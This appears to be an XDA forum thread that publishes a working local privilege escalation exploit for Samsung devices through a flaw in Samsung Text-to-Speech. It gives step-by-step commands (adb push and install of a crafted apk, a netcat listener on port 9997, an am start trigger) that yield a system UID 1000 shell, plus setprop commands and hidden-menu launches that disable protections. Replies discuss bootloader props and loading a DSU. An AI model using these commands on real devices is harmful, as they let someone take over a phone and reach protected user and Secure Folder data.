    Ability to cd to /data/fota and remove updates before they install - Access to most of /efs /efs/imei /efs/sec_efs /efs/FactoryApp - Access to most of /data /data/system /data/user/0/ANY_SYSTEM_APP - The "Insthk" bin becomes useable, - Secure Folder/Separated Apps becomes COMPLETELY compromised if you also install the POC in it (UID 150_system) - start IOTHidden Menu, DM Mode, Service Mode, Multiple Debugging and hidden menus as well as preconfig in system context- Install and use DSU on locked bootloader - Change many protected props, such as: setprop persist.service.adb.root 1 setprop service.adb.root 1 setprop sys.hidden.otatest 1 setprop sys.hiddenmenu.enable 1 setprop persist.sys.knox.device_owner true setprop persist.sys.usb.qxdm.debug 1 setprop sys.usb.qxdm.debug 1 setprop presist.service.adb.enable 1 setprop persist.sys.usb.qxdm.debug 1 setprop service.adb.enable 1 setprop persist.rollback.is_test true setprop sys.oem_unlock_allowed 1 aswell as quite a bit more.

    1674233415470.png



    Note* You need to be on Wifi or Hotspot to set this up.



    Its fairly simple, a Typical Local Privilege escalation.


    The Easy Way - Note, This could trigger some AV's due to embedded ADB and adb dlls, as mentioned in this comment.

    You may also find the source and prebuilts on my github, here.

    Step 1 - Download "Komraids System Shell.zip", (attached is the latest version) and extract anywhere on desktop. Install K0mraids POC.apk, Open atleast one time. Reboot.
    Step 2 - Ensure USB Debugging is ON, and computer is authorized. Also make sure power saving is OFF.
    Step 3 - When device is fully rebooted and unlocked, run systemshell.exe
    Step 4 - You should now be in a shell with UID 1000. Enjoy. Be careful with what you mess with.

    Things to note: The.exe only needs to be run once after each reboot, you can use it if you prefer, or if you are having issues here or want to manually open a system shell yourself, Check out "How it works?" below.

    **You MUST downgrade SMT (Samsung TTS) on EVERY reboot**


    How it works? (stuff for security researchers, devs etc)



    Step 1 - Install the included "komraids_POC.apk" to the device and make sure to open it and let it load at least one time, then push the included "samsungTTSVULN2.apk" to /data/local/tmp (adb push samsungTTSVULN2.apk /data/local/tmp) -> chmod 777 /data/local/tmp/samsungTTSVULN2.apk >>> I advice disabling all battery optimizations for Samsung TTS and Shell, otherwise, it cuts off the shell from time to time.

    Step 2 - Make sure ADB is on, Device connected to wifi and authorized and all power saving is off (as mentioned above) Reboot device. This will load our lib on reboot since TTS loads all native libs on reboot.

    Step 4 - When device reboots, run this command from ADB. adb shell pm install -r -d -f -g --full --install-reason 3 --enable-rollback /data/local/tmp/samsungTTSVULN2.apk ---> it will return "Success" when done.

    Step 5 - Now, open two shells, (OR, See NOTE* below to use App Manager) in the first, do nc -lp 9997 & in the second, do am start -n com.samsung.SMT/.gui.DownloadList -> Look back at the first shell., it should have opened into a new system (UID 1000) shell.

    **You MUST downgrade SMT (Samsung TTS) on EVERY reboot**

    SMT has a receiver that blindly accepts stuff, so a carefully crafted apk (Our "komraids_POC_v1.5.apk") can trick it into loading our neat lib which opens a shell for us on localhost port 9997!

    SOURCE - on GitHub, here.
    Use logcat | grep -i mercury to debug if lib is loaded or not.
    NOTE: You can use something like AppManager, seen here, or another App installer/manager to launch the SMT activity in step 5, make a shortcut to it on your home screen for easy of access if you have issues, give this a go instead of using two shells, only use one for the nc -lp 9997 part and App MAnager to launch activity.
    .





    You are now UID 1000. Enjoy.



    FAQ
    Why wont it connect/open the system shell?
    Various reasons can cause this, one of the most common is "Battery Optimizations", a form of power saving that can kill our apps. Power Saving is the number one issue for problems with this exploit. Second most common is, believe it or not, turning on ADB/WIFI. So make sure you either have a full battery and all power saving features are OFF, or are plugged in via USB.

    Next, make sure to FORCE stop everything and try to nc -lp and launch smt again, i know its annoying, but its taken me many tries before.

    Clear Cache of SMT

    Uninstall PoC, Reboot, Re-install PoC, Reboot, Downgrade SMT.

    Why does this exist?
    Idk, it was supposed to have been patched back in 2019, obviously it wasn't sufficient.

    How do I prevent someone from hacking me with this?
    Simple, be Offensive, set it up and lock up the lib/port, once your using this exploit, no others can because they cant load a second lib of the same. (the vuln is the lang packs for samsung Text-to-speech) -- or, Disable or Remove Samsung Text-To-Speech.

    How do I use this in Termux or other Terminal Emulators?
    You will need to use the manual way, as described in Step 5 of "How it works?"

    I cant get it to work, can anyone help?
    Yes, post here or go to our Telegram Group for support, here (click me)

    Can this work with LSPosed/LSpatch?
    Yes, but it has its limitations currently. I've tested a few modules myself, some work, some don't.

    Will this work with Magisk or Shizuku?
    Yes, But it depends on @topjohnwu and @Rikka, respectfully, to give the green light to me to incorporate this and post those here or post their compatible versions here on their own. I am open to working with them and have already seen and used a working Shizuku mod using this Exploit, but out of respect for the Developer and legality issues, I cant share that here.. HOWEVER, I do believe it is a good idea to get a manager for this built quickly if we plan on developing off of this.

    Will you share the source code?
    Yes, It is already on my GitHub, here.


    How do i open Hidden stuff?
    For now, we will need to do it manually, so try these from System shell
    This opens IOTHiden menu
    am start -n com.sec.hiddenmenu/.IOTHiddenMenu -e 7267864872 72678647376477466
    This opens CID Managers "Preconfig"
    am start -n com.samsung.android.cidmanager/.modules.preconfig.PreconfigActivity -a com.samsung.android.action.SECRET_CODE -d secret_code://27262826 --ei type 2
    This opens the DM Mode on/off Toggle
    am start -n com.sec.hiddenmenu/.DmMode -e 7267864872 72678647376477466
    Ill add more interesting and useful commands/things to do as time goes on. Please do drop any cool things you find here!


    BACK STORY:
    Its full or drama and BS. I reported this to Samsung in October 2022, but they have decided this is GOOGLES problem and forgot to tell me their decision. LONG STORY CUT SHORT, Between the time Samsung decided this was GOOGLES problem and them telling me of that decision, somehow, "another external security researcher" reported this exact thing to google in the context it was their find. IDK who, nor do I really care at this point. Its done and over with, but stuff like this is what makes some security researches ever hesitant to share their finds, even with the shady vendors/OEMS.

    Don't be dumb, I'm not responsible for any mistakes you make.
    PWNED - K0mraid3 2022-10-06 175216.png


    Big shout out to @wr3cckl3ss1 and alll the others for the help testing, debugging and the massive amount more done to help get this right. It was truely a team effort and nothing less then a labor of love & passion for cybersecurity and learning. I learned more during this project with you guys then I can express.

    Huge thanks to @oakieville for the .exe and alot of help tweaking the code of this project.


    This project was brought to you by VAULT-TEC Dev Ops!
    6
    ***Moderator Announcement***

    Flaming and disrespect will absolutely not be tolerated. Repeated violations may result in account bans. Compliance with all XDA Forum Rules and Policies is MANDATORY for all members. While you're free to discuss the technical details and merits of this exploit, as well as the wisdom in deferring updates, you WILL treat each other with respect and dignity, and those who fail to do so will no longer be permitted to participate on XDA.

    In addition, keep your posts ON TOPIC.

    If you feel someone's posts violate the Forum Rules, use the Report button and let the moderator staff handle it before it becomes an issue.

    Don't make us get involved again.
    5
    yup, goes back to the age old issue, How do manipulate that prop? SEM Factory app has something called GRDM, that mentions bootloader, I really want to see if there's anything worth while in there too.
    If you know how, throw SEM Factory app in JADX, you'll see what i mean.

    This prop is parsed by init at boot from /proc/cmdline, so it is set by the bootloader itself:
    C:
    #if defined(CONFIG_SECURE_DEVELOPER_MODE)
        add_cmdline("androidboot.other.locked=%d", 1);
    #endif

    Even if you guys find a way to spoof the prop (the only possible way imo is via resetprop) and show the OEM Unlock toggle, it must be assured that the bootloader itself also supports OEM Unlocking, newer Samsung devices with SVB also require to unlock the bootloader via Download Mode since the OEM Lock flag is now stored in RPMB. I don't have much knowledge about USA variants so take my suggestions with a grain of salt
    5
    I'm sorry but i don't get you. can i root my device with this method
    its a system shell uid 1000 it is not root
    5
    USE AT OWN RISK....
    What worked for me...might not for you....


    How to load up a "DSU" on your device using System Shell and NO BL unlock.

    (See pics as needed)

    For me on my S22 Ultra S908U1. What i did was....execute both activities in STEP 1 AND 2. Then when it said it was ready. I hit restart in the notification. And presto.....now i loaded a replica DSU of my existing firmware. So yes, while it's not a GSI or DSU of your choosing....you still have a DSU. The main focus is that NOTIFICATION....it's what takes you to and from your regular firmware and that DSU. As long you don't DISCARD IT.....it should come back thru reboots. This goes for the DSU as well. Word of warning....the DSU i did get loaded up...was pretty much packed with a ton of stuff. And locked up all the space i had. 8GB. I ended up removing pretty much all packages. Except Play Services....Play Store....and a few other packages. Another warning....the one downside to all of this is IF YOU do this and want the benefits of this...going back and forth.... YOUR FACE AND FINGERPRINT will always end up being corrupted.

    In SYSTEM SHELL execute and then follow prompts

    Step 1: am start -n com.android.dynsystem/.VerificationActivity

    Step 2: am start -n com.android.settings/.development.DSULoader